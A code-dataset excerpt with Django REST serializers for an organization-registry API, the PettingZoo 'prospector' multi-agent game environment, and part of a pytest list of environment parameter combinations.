class OrganizationLabelSerializer(serializers.Serializer):
label = serializers.CharField()
iso639 = serializers.CharField()
class CountrySerializer(serializers.Serializer):
country_name = serializers.CharField()
country_code = serializers.CharField()
class ExternalIdSerializer(serializers.Serializer):
preferred = serializers.CharField()
all = serializers.StringRelatedField(many=True)
class GridExternalIdSerializer(serializers.Serializer):
preferred = serializers.CharField()
all = serializers.StringRelatedField()
class ExternalIdsSerializer(serializers.Serializer):
ISNI = ExternalIdSerializer(required=False)
FundRef = ExternalIdSerializer(required=False)
HESA = ExternalIdSerializer(required=False)
UCAS = ExternalIdSerializer(required=False)
UKPRN = ExternalIdSerializer(required=False)
CNRS = ExternalIdSerializer(required=False)
OrgRef = ExternalIdSerializer(required=False)
Wikidata = ExternalIdSerializer(required=False)
GRID = GridExternalIdSerializer(required=False)
class OrganizationSerializer(serializers.Serializer):
id = serializers.CharField()
name = serializers.CharField()
types = serializers.StringRelatedField(many=True)
links = serializers.StringRelatedField(many=True)
aliases = serializers.StringRelatedField(many=True)
acronyms = serializers.StringRelatedField(many=True)
status = serializers.CharField()
wikipedia_url = serializers.CharField()
labels = OrganizationLabelSerializer(many=True)
country = CountrySerializer()
external_ids = ExternalIdsSerializer()
class BucketSerializer(serializers.Serializer):
id = serializers.CharField()
title = serializers.CharField()
count = serializers.IntegerField()
class AggregationsSerializer(serializers.Serializer):
types = BucketSerializer(many=True)
countries = BucketSerializer(many=True)
class ListResultSerializer(serializers.Serializer):
number_of_results = serializers.IntegerField()
time_taken = serializers.IntegerField()
items = OrganizationSerializer(many=True)
meta = AggregationsSerializer()
class MatchedOrganizationSerializer(serializers.Serializer):
substring = serializers.CharField()
score = serializers.FloatField()
matching_type = serializers.CharField()
chosen = serializers.BooleanField()
organization = OrganizationSerializer()
class MatchingResultSerializer(serializers.Serializer):
number_of_results = serializers.IntegerField()
items = MatchedOrganizationSerializer(many=True)
class ErrorsSerializer(serializers.Serializer):
errors = serializers.StringRelatedField(many=True)
```
#### File: rorapi/tests/utils.py
```python
class AttrDict(dict):
def __init__(self, nested_dict):
for k, v in nested_dict.items():
if isinstance(v, dict):
self[k] = AttrDict(v)
elif isinstance(v, list):
self[k] = [
AttrDict(e) if isinstance(e, dict) else e for e in v
]
else:
self[k] = v
def __getattr__(self, attr):
if attr not in self:
raise AttributeError(
'\'AttrDict\' object has no attribute \'{}\''.format(attr))
return self[attr]
class IterableAttrDict():
def __init__(self, nested_dict, iter_list):
self.attr_dict = AttrDict(nested_dict)
self.iter_list = [AttrDict(i) for i in iter_list]
def __iter__(self):
return iter(self.iter_list)
def __getitem__(self, key):
return self.iter_list[key]
def __getattr__(self, attr):
return self.attr_dict.__getattr__(attr)
``` |
{
"source": "jjshoots/PettingZoo",
"score": 2
} |
#### File: butterfly/prospector/prospector.py
```python
import itertools as it
import math
import os
from enum import IntEnum, auto
import numpy as np
import pygame as pg
import pymunk as pm
from gym import spaces
from gym.utils import EzPickle, seeding
from pymunk import Vec2d
from pettingzoo import AECEnv
from pettingzoo.utils import agent_selector, wrappers
from pettingzoo.utils.conversions import parallel_wrapper_fn
from . import constants as const
from . import utils
from .manual_control import manual_control
class CollisionTypes(IntEnum):
PROSPECTOR = auto()
BOUNDARY = auto()
WATER = auto()
BANK = auto()
GOLD = auto()
BANKER = auto()
class Prospector(pg.sprite.Sprite):
def __init__(self, pos, space, num, *sprite_groups):
super().__init__(sprite_groups)
self.image = utils.load_image(["prospector.png"])
self.id = num
self.rect = self.image.get_rect(center=pos)
self.orig_image = self.image.copy()
# Create the physics body and shape of this object.
moment = pm.moment_for_circle(1, 0, const.AGENT_RADIUS)
self.body = pm.Body(1, moment, body_type=pm.Body.DYNAMIC)
self.body.nugget = None
self.body.sprite_type = "prospector"
self.shape = pm.Circle(self.body, const.AGENT_RADIUS)
self.shape.elasticity = 0.0
self.shape.collision_type = CollisionTypes.PROSPECTOR
self.body.position = utils.flipy(pos)
# Add them to the Pymunk space.
self.space = space
self.space.add(self.body, self.shape)
def reset(self, pos):
self.body.angle = 0
self.body.angular_velocity = 0
self.image = pg.transform.rotozoom(self.orig_image, 0, 1)
self.rect = self.image.get_rect(center=pos)
self.body.position = utils.flipy(pos)
self.body.velocity = Vec2d(0.0, 0.0)
self.body.force = Vec2d(0.0, 0.0)
self.body.nugget = None
@property
def center(self):
return self.rect.center
def update(self, action):
# These actions are performed with the agent's angle in mind
# forward/backward action
y_vel = action[0] * const.PROSPECTOR_SPEED
# left/right action
x_vel = action[1] * const.PROSPECTOR_SPEED
delta_angle = action[2] * const.MAX_SPRITE_ROTATION
self.body.angle += delta_angle
self.body.angular_velocity = 0
move = pm.Vec2d(x_vel, y_vel)
self.body.apply_force_at_local_point(move, point=(0, 0))
def synchronize_center(self):
self.rect.center = utils.flipy(self.body.position)
self.image = pg.transform.rotate(self.orig_image, math.degrees(self.body.angle))
self.rect = self.image.get_rect(center=self.rect.center)
def update_gold(self):
if self.body.nugget is not None:
self.body.nugget.update(self.body.position, self.body.angle, False)
def convert_img(self):
self.image = self.image.convert_alpha()
def __str__(self):
return f"prospector_{self.id}"
def __repr__(self):
return self.__str__()
class Banker(pg.sprite.Sprite):
def __init__(self, pos, space, num, *sprite_groups):
super().__init__(sprite_groups)
self.image = utils.load_image(["bankers", f"{num}.png"])
self.id = num
self.rect = self.image.get_rect(center=pos)
self.orig_image = self.image.copy()
moment = pm.moment_for_circle(1, 0, const.AGENT_RADIUS)
self.body = pm.Body(1, moment, body_type=pm.Body.DYNAMIC)
self.body.nugget = None
self.body.sprite_type = "banker"
self.shape = pm.Circle(self.body, const.AGENT_RADIUS)
self.shape.collision_type = CollisionTypes.BANKER
self.body.position = utils.flipy(pos)
# Add them to the Pymunk space.
self.space = space
self.space.add(self.body, self.shape)
def reset(self, pos):
self.body.angle = 0
self.image = pg.transform.rotozoom(self.orig_image, 0, 1)
self.rect = self.image.get_rect(center=pos)
self.body.position = utils.flipy(pos)
self.body.velocity = Vec2d(0.0, 0.0)
self.body.nugget = None
@property
def center(self):
return self.rect.center
def update(self, action):
# up/down action
y_vel = action[0] * const.BANKER_SPEED
# left/right action
x_vel = action[1] * const.BANKER_SPEED
# Subtract math.pi / 2 because sprite starts off with math.pi / 2 rotated
angle_radians = math.atan2(y_vel, x_vel) - (math.pi / 2)
# Angle is determined only by current trajectory.
if not all(a == 0 for a in action):
self.body.angle = angle_radians
self.body.angular_velocity = 0
# rotate movement backwards with a magnitude of self.body.angle
# so that sprite moves forward in chosen direction
move = pm.Vec2d(x_vel, y_vel).rotated(-self.body.angle)
self.body.apply_force_at_local_point(move, point=(0, 0))
def synchronize_center(self):
self.rect.center = utils.flipy(self.body.position)
self.image = pg.transform.rotate(self.orig_image, math.degrees(self.body.angle))
self.rect = self.image.get_rect(center=self.rect.center)
def update_gold(self):
if self.body.nugget is not None:
self.body.nugget.update(
self.body.position, self.body.angle + (math.pi / 2), True
)
def convert_img(self):
self.image = self.image.convert_alpha()
def __str__(self):
return f"banker_{self.id}"
def __repr__(self):
return self.__str__()
class Fence(pg.sprite.Sprite):
def __init__(self, w_type, sprite_pos, body_pos, verts, space, *sprite_groups):
super().__init__(sprite_groups)
self.rects = []
if w_type == "top":
self.tile = utils.load_image(["fence_horiz_tile.png"])
size = self.tile.get_rect().size
x = 15
y = 0
while x <= 1230:
rect = pg.Rect(x, y, *size)
self.rects.append(rect)
x += 50
elif w_type in ["right", "left"]:
self.tile = utils.load_image(["fence_vert_tile.png"])
size = self.tile.get_rect().size
x = 6 if w_type == "left" else 1265
y = 0
while y <= const.VERT_FENCE_HEIGHT:
rect = pg.Rect(x, y, *size)
self.rects.append(rect)
y += 33
else:
raise ValueError("Fence image not found! Check the spelling")
self.body = pm.Body(body_type=pm.Body.STATIC)
# Transform pygame vertices to fit Pymunk body
invert_verts = utils.invert_y(verts)
self.shape = pm.Poly(self.body, invert_verts)
self.shape.elasticity = 0.0
self.shape.collision_type = CollisionTypes.BOUNDARY
self.body.position = utils.flipy(body_pos)
space.add(self.body, self.shape)
def full_draw(self, screen):
for rect in self.rects:
screen.blit(self.tile, rect)
def convert_img(self):
self.tile = self.tile.convert_alpha()
class Bank(pg.sprite.Sprite):
def __init__(self, pos, verts, space, *sprite_groups):
super().__init__(sprite_groups)
self.image = utils.load_image(["bank.png"])
self.rect = self.image.get_rect(topleft=pos)
self.body = pm.Body(body_type=pm.Body.STATIC)
invert_verts = utils.invert_y(verts)
self.shape = pm.Poly(self.body, invert_verts)
self.shape.collision_type = CollisionTypes.BANK
self.body.position = utils.flipy(pos)
self.space = space
self.space.add(self.body, self.shape)
def convert_img(self):
self.image = self.image.convert_alpha()
class Gold(pg.sprite.Sprite):
ids = it.count(0)
def __init__(self, pos, body, space, *sprite_groups):
super().__init__(sprite_groups)
self.id = next(self.ids)
self.image = utils.load_image(["gold.png"])
self.orig_image = self.image
self.rect = self.image.get_rect()
self.moment = pm.moment_for_circle(1, 0, const.GOLD_RADIUS)
self.body = pm.Body(1, self.moment, body_type=pm.Body.KINEMATIC)
self.body.position = body.position
self.shape = pm.Circle(self.body, const.GOLD_RADIUS)
self.shape.collision_type = CollisionTypes.GOLD
# only triggers collision callbacks, doesn't create real collisions
self.shape.sensor = True
self.shape.id = self.id
self.space = space
self.space.add(self.body, self.shape)
self.initial_angle = body.angle - Vec2d(0, -1).angle
self.parent_body = body
def update(self, pos, angle, banker: bool):
if banker:
new_angle = angle
else:
new_angle = angle - self.initial_angle
new_pos = pos + Vec2d(const.AGENT_RADIUS + 9, 0).rotated(new_angle)
self.body.position = new_pos
self.body.angular_velocity = 0
self.rect.center = utils.flipy(self.body.position)
self.image = pg.transform.rotozoom(
self.orig_image, math.degrees(self.body.angle), 1
)
self.rect = self.image.get_rect(center=self.rect.center)
def convert_img(self):
self.image = self.image.convert_alpha()
class Water:
def __init__(self, pos, verts, space, rng):
self.num_cols = math.ceil(const.SCREEN_WIDTH / const.TILE_SIZE)
self.num_rows = math.ceil(const.WATER_HEIGHT / const.TILE_SIZE)
self.top_tile = utils.load_image(["river_to_sand_tile.png"])
self.tile = utils.load_image(["river_tile.png"])
self.debris_tile = utils.load_image(["debris", "seaweed_water.png"])
tile_size = self.tile.get_size()
self.rects = []
for row in range(self.num_rows):
new_row = []
for col in range(self.num_cols):
rect = pg.Rect(
col * const.TILE_SIZE, pos[1] + (row * const.TILE_SIZE), *tile_size
)
new_row.append(rect)
self.rects.append(new_row)
self.body = pm.Body(body_type=pm.Body.STATIC)
# Transform pygame vertices to fit Pymunk body
invert_verts = utils.invert_y(verts)
self.shape = pm.Poly(self.body, invert_verts)
self.shape.collision_type = CollisionTypes.WATER
self.body.position = utils.flipy(pos)
self.space = space
self.space.add(self.body, self.shape)
def generate_debris(self, rng):
self.debris = []
for col in range(1, self.num_cols - 1, 3):
if rng.random_sample() >= 0.5:
y = rng.integers(0, 2)
x = col + rng.integers(0, 3)
rect = self.rects[y][x].copy()
rect.x += 3
rect.y += 9
self.debris.append([self.debris_tile, rect])
def full_draw(self, screen):
for rect in self.rects[0]:
screen.blit(self.top_tile, rect)
for rect in self.rects[1]:
screen.blit(self.tile, rect)
for pair in self.debris:
screen.blit(pair[0], pair[1])
def draw(self, screen):
self.full_draw()
def convert_img(self):
self.top_tile = self.top_tile.convert_alpha()
self.tile = self.tile.convert_alpha()
self.debris_tile = self.debris_tile.convert_alpha()
class Background:
def __init__(self, rng):
self.num_cols = math.ceil(const.SCREEN_WIDTH / const.TILE_SIZE)
self.num_rows = (
math.ceil((const.SCREEN_HEIGHT - const.WATER_HEIGHT) / const.TILE_SIZE) + 1
)
self.tile = utils.load_image(["sand_tile.png"])
self.debris_tiles = {
0: utils.load_image(["debris", "0.png"]),
1: utils.load_image(["debris", "1.png"]),
2: utils.load_image(["debris", "2.png"]),
3: utils.load_image(["debris", "3.png"]),
}
# Used when updating environment and drawing
self.dirty_rects = []
self.rects = []
# same as (const.TILE_SIZE, const.TILE_SIZE)
tile_size = self.tile.get_size()
for row in range(self.num_rows):
new_row = []
for col in range(self.num_cols):
rect = pg.Rect(col * const.TILE_SIZE, row * const.TILE_SIZE, *tile_size)
new_row.append(rect)
self.rects.append(new_row)
def generate_debris(self, rng):
self.debris = {}
for row in range(1, self.num_rows - 1, 3):
for col in range(1, self.num_cols - 1, 3):
y = row + rng.integers(0, 3)
if y == self.num_rows - 2:
y += -1
x = col + rng.integers(0, 3)
choice = rng.integers(0, 4)
self.debris[self.rects[y][x].topleft] = self.debris_tiles[choice]
def full_draw(self, screen):
for row in self.rects:
for rect in row:
screen.blit(self.tile, rect)
debris = self.debris.get(rect.topleft, None)
if debris is not None:
screen.blit(debris, rect)
def draw(self, screen):
# self.full_draw(screen)
for rect in self.dirty_rects:
screen.blit(self.tile, rect)
debris = self.debris.get(rect.topleft, None)
if debris is not None:
screen.blit(debris, rect)
self.dirty_rects.clear()
def update(self, sprite_rect: pg.Rect):
top_y = int(sprite_rect.top // const.TILE_SIZE)
bottom_y = int(sprite_rect.bottom // const.TILE_SIZE)
left_x = int(sprite_rect.left // const.TILE_SIZE)
right_x = int(sprite_rect.right // const.TILE_SIZE)
self.dirty_rects.append(self.rects[top_y][left_x])
self.dirty_rects.append(self.rects[top_y][right_x])
self.dirty_rects.append(self.rects[bottom_y][left_x])
self.dirty_rects.append(self.rects[bottom_y][right_x])
def convert_img(self):
self.tile = self.tile.convert_alpha()
for i in self.debris_tiles:
self.debris_tiles[i].convert_alpha()
def env(**kwargs):
env = raw_env(**kwargs)
env = wrappers.ClipOutOfBoundsWrapper(env)
env = wrappers.OrderEnforcingWrapper(env)
return env
parallel_env = parallel_wrapper_fn(env)
class raw_env(AECEnv, EzPickle):
def __init__(
self,
ind_reward=0.8,
group_reward=0.1,
other_group_reward=0.1,
prospec_find_gold_reward=1,
prospec_handoff_gold_reward=1,
banker_receive_gold_reward=1,
banker_deposit_gold_reward=1,
max_cycles=450,
):
EzPickle.__init__(
self,
ind_reward,
group_reward,
other_group_reward,
prospec_find_gold_reward,
prospec_handoff_gold_reward,
banker_receive_gold_reward,
banker_deposit_gold_reward,
max_cycles,
)
total_reward_factor = ind_reward + group_reward + other_group_reward
if not math.isclose(total_reward_factor, 1.0, rel_tol=1e-09):
raise ValueError(
"The sum of the individual reward, group reward, and other "
"group reward should add up to approximately 1.0"
)
self.agents = []
self.sprite_list = [
"bankers/0.png",
"bankers/1.png",
"bankers/2.png",
"prospector.png",
]
self.max_cycles = max_cycles
pg.init()
self.seed()
self.closed = False
self.background = Background(self.rng)
self.space = pm.Space()
self.space.gravity = Vec2d(0.0, 0.0)
self.space.iterations = 20 # for decreasing bounciness
self.space.damping = 0.0
self.all_sprites = pg.sprite.RenderUpdates()
self.gold = []
self.water = Water(
const.WATER_INFO[0], const.WATER_INFO[1], self.space, self.rng
)
# Generate random positions for each prospector agent
prospector_info = [
(i, utils.rand_pos("prospector", self.rng))
for i in range(const.NUM_PROSPECTORS)
]
self.prospectors = {}
for num, pos in prospector_info:
prospector = Prospector(pos, self.space, num, self.all_sprites)
identifier = f"prospector_{num}"
self.prospectors[identifier] = prospector
self.agents.append(identifier)
banker_info = [
(i, utils.rand_pos("banker", self.rng)) for i in range(const.NUM_BANKERS)
]
self.bankers = {}
for num, pos in banker_info:
banker = Banker(pos, self.space, num, self.all_sprites)
identifier = f"banker_{num}"
self.bankers[identifier] = banker
self.agents.append(identifier)
self.banks = []
for pos, verts in const.BANK_INFO:
self.banks.append(Bank(pos, verts, self.space, self.all_sprites))
self.fences = []
for w_type, s_pos, b_pos, verts in const.FENCE_INFO:
f = Fence(w_type, s_pos, b_pos, verts, self.space)
self.fences.append(f)
self.metadata = {
"render_modes": ["human", "rgb_array"],
"name": "prospector_v4",
"is_parallelizable": True,
"render_fps": const.FPS,
}
self.action_spaces = {}
for p in self.prospectors:
self.action_spaces[p] = spaces.Box(
low=np.float32(-1.0), high=np.float32(1.0), shape=(3,)
)
for b in self.bankers:
self.action_spaces[b] = spaces.Box(
low=np.float32(-1.0), high=np.float32(1.0), shape=(2,)
)
self.observation_spaces = {}
self.last_observation = {}
for p in self.prospectors:
self.last_observation[p] = None
self.observation_spaces[p] = spaces.Box(
low=0, high=255, shape=const.PROSPEC_OBSERV_SHAPE, dtype=np.uint8
)
for b in self.bankers:
self.last_observation[b] = None
self.observation_spaces[b] = spaces.Box(
low=0, high=255, shape=const.BANKER_OBSERV_SHAPE, dtype=np.uint8
)
self.state_space = spaces.Box(
low=0,
high=255,
shape=((const.SCREEN_HEIGHT, const.SCREEN_WIDTH, 3)),
dtype=np.uint8,
)
self.possible_agents = self.agents[:]
self._agent_selector = agent_selector(self.agents)
self.agent_selection = self._agent_selector.next()
self.reset()
# Collision Handler Functions --------------------------------------------
# Water to Prospector
def add_gold(arbiter, space, data):
prospec_shape = arbiter.shapes[0]
prospec_body = prospec_shape.body
for k, v in self.prospectors.items():
if v.body is prospec_body:
self.rewards[k] += ind_reward * prospec_find_gold_reward
else:
self.rewards[k] += group_reward * prospec_find_gold_reward
for k in self.bankers:
self.rewards[k] += other_group_reward * prospec_find_gold_reward
if prospec_body.nugget is None:
position = arbiter.contact_point_set.points[0].point_a
gold = Gold(position, prospec_body, self.space, self.all_sprites)
self.gold.append(gold)
prospec_body.nugget = gold
return True
# Prospector to banker
def handoff_gold_handler(arbiter, space, data):
banker_shape, gold_shape = arbiter.shapes
gold_sprite = None
for g in self.gold:
if g.id == gold_shape.id:
gold_sprite = g
# gold_sprite is None if gold was handed off to the bank right before
# calling this collision handler
# This collision handler is only for prospector -> banker gold handoffs
if (
gold_sprite is None
or gold_sprite.parent_body.sprite_type != "prospector"
):
return True
banker_body = banker_shape.body
prospec_body = gold_sprite.parent_body
normal = arbiter.contact_point_set.normal
# Correct the angle because banker's head is rotated pi/2
corrected = utils.normalize_angle(banker_body.angle + (math.pi / 2))
normalized_normal = utils.normalize_angle(normal.angle)
if (
corrected - const.BANKER_HANDOFF_TOLERANCE
<= normalized_normal
<= corrected + const.BANKER_HANDOFF_TOLERANCE
):
# transfer gold
gold_sprite.parent_body.nugget = None
gold_sprite.parent_body = banker_body
banker_body.nugget = gold_sprite
for k, v in self.prospectors.items():
self.rewards[k] += other_group_reward * banker_receive_gold_reward
if v.body is prospec_body:
self.rewards[k] += ind_reward * prospec_handoff_gold_reward
else:
self.rewards[k] += group_reward * prospec_handoff_gold_reward
for k, v in self.bankers.items():
self.rewards[k] += other_group_reward * prospec_handoff_gold_reward
if v.body is banker_body:
self.rewards[k] += ind_reward * banker_receive_gold_reward
else:
self.rewards[k] += group_reward * banker_receive_gold_reward
return True
# Banker to bank
def gold_score_handler(arbiter, space, data):
gold_shape, _ = arbiter.shapes
for g in self.gold:
if g.id == gold_shape.id:
gold_class = g
if gold_class.parent_body.sprite_type == "banker":
self.space.remove(gold_shape, gold_shape.body)
gold_class.parent_body.nugget = None
banker_body = gold_class.parent_body
for k, v in self.bankers.items():
if v.body is banker_body:
self.rewards[k] += ind_reward * banker_deposit_gold_reward
else:
self.rewards[k] += group_reward * banker_deposit_gold_reward
for k in self.prospectors:
self.rewards[k] += other_group_reward * banker_deposit_gold_reward
self.gold.remove(gold_class)
self.all_sprites.remove(gold_class)
return False
# Create the collision event generators
gold_dispenser = self.space.add_collision_handler(
CollisionTypes.PROSPECTOR, CollisionTypes.WATER
)
gold_dispenser.begin = add_gold
handoff_gold = self.space.add_collision_handler(
CollisionTypes.BANKER, CollisionTypes.GOLD
)
handoff_gold.begin = handoff_gold_handler
gold_score = self.space.add_collision_handler(
CollisionTypes.GOLD, CollisionTypes.BANK
)
gold_score.begin = gold_score_handler
def seed(self, seed=None):
self.rng, seed = seeding.np_random(seed)
def observe(self, agent):
capture = pg.surfarray.pixels3d(self.screen)
if agent in self.prospectors:
ag = self.prospectors[agent]
side_len = const.PROSPEC_OBSERV_SIDE_LEN
else:
ag = self.bankers[agent]
side_len = const.BANKER_OBSERV_SIDE_LEN
delta = side_len // 2
x, y = ag.center # Calculated property added to prospector and banker classes
sub_screen = np.array(
capture[
max(0, x - delta) : min(const.SCREEN_WIDTH, x + delta),
max(0, y - delta) : min(const.SCREEN_HEIGHT, y + delta),
:,
],
dtype=np.uint8,
)
s_x, s_y, _ = sub_screen.shape
pad_x = side_len - s_x
if x > const.SCREEN_WIDTH - delta: # Right side of the screen
sub_screen = np.pad(
sub_screen, pad_width=((0, pad_x), (0, 0), (0, 0)), mode="constant"
)
elif x < 0 + delta:
sub_screen = np.pad(
sub_screen, pad_width=((pad_x, 0), (0, 0), (0, 0)), mode="constant"
)
pad_y = side_len - s_y
if y > const.SCREEN_HEIGHT - delta: # Bottom of the screen
sub_screen = np.pad(
sub_screen, pad_width=((0, 0), (0, pad_y), (0, 0)), mode="constant"
)
elif y < 0 + delta:
sub_screen = np.pad(
sub_screen, pad_width=((0, 0), (pad_y, 0), (0, 0)), mode="constant"
)
sub_screen = np.rot90(sub_screen, k=3)
sub_screen = np.fliplr(sub_screen).astype(np.uint8)
self.last_observation[agent] = sub_screen
return sub_screen
def observation_space(self, agent):
return self.observation_spaces[agent]
def action_space(self, agent):
return self.action_spaces[agent]
def state(self):
"""
Returns an observation of the global environment
"""
state = pg.surfarray.pixels3d(self.screen).copy()
state = np.rot90(state, k=3)
state = np.fliplr(state)
return state
def step(self, action):
if self.dones[self.agent_selection]:
return self._was_done_step(action)
agent_id = self.agent_selection
all_agents_updated = self._agent_selector.is_last()
self.rewards = {agent: 0 for agent in self.agents}
if agent_id in self.prospectors:
agent = self.prospectors[agent_id]
else:
agent = self.bankers[agent_id]
self.background.update(agent.rect)
nugget = agent.body.nugget
if nugget is not None:
self.background.update(nugget.rect)
agent.update(action)
# Only take next step in game if all agents have received an action
if all_agents_updated:
for _ in range(const.STEPS_PER_FRAME):
self.space.step(const.SPACE_STEP_DELTA)
for pr in self.prospectors.values():
pr.synchronize_center()
pr.update_gold()
self.background.update(pr.rect)
nugget = pr.body.nugget
if nugget is not None:
self.background.update(nugget.rect)
for b in self.bankers.values():
b.synchronize_center()
b.update_gold()
self.background.update(b.rect)
nugget = b.body.nugget
if nugget is not None:
self.background.update(nugget.rect)
self.draw()
self.frame += 1
# If we reached max frames, we're done
if self.frame == self.max_cycles:
self.dones = dict(zip(self.agents, [True for _ in self.agents]))
if self.rendering:
pg.event.pump()
self.agent_selection = self._agent_selector.next()
self._cumulative_rewards[agent_id] = 0
self._accumulate_rewards()
def reset(self, seed=None, options=None):
if seed is not None:
self.seed(seed=seed)
self.screen = pg.Surface(const.SCREEN_SIZE)
self.done = False
self.background.generate_debris(self.rng)
self.water.generate_debris(self.rng)
for p in self.prospectors.values():
p.reset(utils.rand_pos("prospector", self.rng))
for b in self.bankers.values():
b.reset(utils.rand_pos("banker", self.rng))
for g in self.gold:
self.space.remove(g.shape, g.body)
self.all_sprites.remove(g)
self.gold = []
self.agents = self.possible_agents[:]
self.rewards = dict(zip(self.agents, [0 for _ in self.agents]))
self._cumulative_rewards = dict(zip(self.agents, [0 for _ in self.agents]))
self.dones = dict(zip(self.agents, [False for _ in self.agents]))
self.infos = dict(zip(self.agents, [{} for _ in self.agents]))
self.rendering = False
self.frame = 0
self.background.dirty_rects.clear()
self._agent_selector.reinit(self.agents)
self.agent_selection = self._agent_selector.next()
self.full_draw()
def render(self, mode="human"):
if mode == "human":
if not self.rendering:
self.rendering = True
pg.display.init()
self.screen = pg.display.set_mode(const.SCREEN_SIZE)
self.background.convert_img()
self.water.convert_img()
for f in self.fences:
f.convert_img()
for s in self.all_sprites.sprites():
s.convert_img()
self.full_draw()
pg.display.flip()
elif mode == "rgb_array": # no display, return whole screen as array
observation = np.array(pg.surfarray.pixels3d(self.screen))
transposed = np.transpose(observation, axes=(1, 0, 2))
return transposed
def full_draw(self):
"""Called to draw everything when first rendering"""
self.background.full_draw(self.screen)
for f in self.fences:
f.full_draw(self.screen)
self.water.full_draw(self.screen)
self.all_sprites.draw(self.screen)
def draw(self):
"""Called after each frame, all agents updated"""
self.background.draw(self.screen)
for f in self.fences:
f.full_draw(self.screen)
self.water.full_draw(self.screen)
self.all_sprites.draw(self.screen)
def close(self):
if not self.closed:
self.closed = True
if self.rendering:
pg.event.pump()
pg.display.quit()
pg.quit()
# Art by <NAME>
```
#### File: PettingZoo/test/all_parameter_combs.py
```python
import pytest
from pettingzoo.test.api_test import api_test
from pettingzoo.test.max_cycles_test import max_cycles_test
from pettingzoo.test.parallel_test import parallel_api_test
from pettingzoo.test.render_test import render_test
from pettingzoo.test.seed_test import check_environment_deterministic, seed_test
from pettingzoo.test.state_test import state_test
from pettingzoo.utils import aec_to_parallel, parallel_to_aec
from .all_modules import * # noqa: F403
from .all_modules import all_environments
parameterized_envs = [
["atari/boxing_v2", boxing_v2, dict(obs_type="grayscale_image")],
["atari/boxing_v2", boxing_v2, dict(obs_type="ram")],
["atari/boxing_v2", boxing_v2, dict(full_action_space=False)],
["atari/combat_plane_v2", combat_plane_v2, dict(game_version="jet")],
["atari/combat_plane_v2", combat_plane_v2, dict(guided_missile=True)],
["atari/combat_tank_v2", combat_tank_v2, dict(has_maze=True)],
["atari/combat_tank_v2", combat_tank_v2, dict(is_invisible=True)],
["atari/combat_tank_v2", combat_tank_v2, dict(billiard_hit=True)],
["atari/maze_craze_v3", maze_craze_v3, dict(game_version="race")],
["atari/maze_craze_v3", maze_craze_v3, dict(game_version="capture")],
["atari/maze_craze_v3", maze_craze_v3, dict(visibilty_level=1)],
["atari/maze_craze_v3", maze_craze_v3, dict(visibilty_level=3)],
[
"atari/space_invaders_v2",
space_invaders_v2,
dict(
alternating_control=True,
moving_shields=True,
zigzaging_bombs=True,
fast_bomb=True,
invisible_invaders=True,
),
],
["classic/leduc_holdem_v4", leduc_holdem_v4, dict(num_players=2)],
["classic/leduc_holdem_v4", leduc_holdem_v4, dict(num_players=3)],
["classic/leduc_holdem_v4", leduc_holdem_v4, dict(num_players=4)],
["classic/texas_holdem_v4", texas_holdem_v4, dict(num_players=2)],
["classic/texas_holdem_v4", texas_holdem_v4, dict(num_players=3)],
["classic/texas_holdem_v4", texas_holdem_v4, dict(num_players=4)],
["classic/texas_holdem_no_limit_v6", texas_holdem_no_limit_v6, dict(num_players=2)],
["classic/texas_holdem_no_limit_v6", texas_holdem_no_limit_v6, dict(num_players=3)],
["classic/texas_holdem_no_limit_v6", texas_holdem_no_limit_v6, dict(num_players=4)],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(spawn_rate=50),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(num_knights=4, num_archers=5),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(killable_knights=True, killable_archers=True),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(killable_knights=False, killable_archers=False),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(line_death=False),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(vector_state=False),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(vector_state=False, pad_observation=False),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(max_cycles=100),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(use_typemasks=False),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(max_zombies=2, max_arrows=60),
],
["butterfly/pistonball_v6", pistonball_v6, dict(continuous=True)],
["butterfly/pistonball_v6", pistonball_v6, dict(n_pistons=30)],
["butterfly/pistonball_v6", pistonball_v6, dict(continuous=False)],
[
"butterfly/pistonball_v6",
pistonball_v6,
dict(random_drop=True, random_rotate=True),
],
[
"butterfly/pistonball_v6",
pistonball_v6,
dict(random_drop=False, random_rotate=False),
],
[
"butterfly/prospector_v4",
prospector_v4,
dict(
ind_reward=0.8,
group_reward=0.1,
other_group_reward=0.1,
prospec_find_gold_reward=1,
prospec_handoff_gold_reward=1,
banker_receive_gold_reward=1,
banker_deposit_gold_reward=1,
max_cycles=900,
),
],
["classic/go_v5", go_v5, dict(board_size=13, komi=2.5)],
["classic/go_v5", go_v5, dict(board_size=9, komi=0.0)],
["classic/hanabi_v4", hanabi_v4, dict(colors=3)],
["classic/hanabi_v4", hanabi_v4, dict(ranks=3)],
["classic/hanabi_v4", hanabi_v4, dict(players=4)],
["classic/hanabi_v4", hanabi_v4, dict(hand_size=5)],
["classic/hanabi_v4", hanabi_v4, dict(max_information_tokens=3)],
["classic/hanabi_v4", hanabi_v4, dict(max_life_tokens=2)],
[
"classic/hanabi_v4",
hanabi_v4,
dict(
colors=5,
ranks=3,
players=4,
hand_size=5,
max_information_tokens=3,
max_life_tokens=2,
),
],
["classic/hanabi_v4", hanabi_v4, dict(observation_type=0)],
["classic/hanabi_v4", hanabi_v4, dict(observation_type=1)],
["classic/hanabi_v4", hanabi_v4, dict(random_start_player=False)],
["classic/hanabi_v4", hanabi_v4, dict(random_start_player=True)],
["magent/tiger_deer_v4", tiger_deer_v4, dict(minimap_mode=True)],
["magent/battle_v4", battle_v4, dict(minimap_mode=False)],
[
"magent/battlefield_v5",
battlefield_v5,
dict(minimap_mode=False, extra_features=False),
],
[
"magent/battlefield_v5",
battlefield_v5,
dict(minimap_mode=False, extra_features=True),
],
[
"magent/battlefield_v5",
battlefield_v5,
dict(minimap_mode=True, extra_features=False),
],
[
"magent/battlefield_v5",
battlefield_v5,
dict(minimap_mode=True, extra_features=True),
],
["magent/adversarial_pursuit_v4", adversarial_pursuit_v4, dict(map_size=15)],
["magent/battle_v4", battle_v4, dict(map_size=15)],
["magent/battlefield_v5", battlefield_v5, dict(map_size=46)],
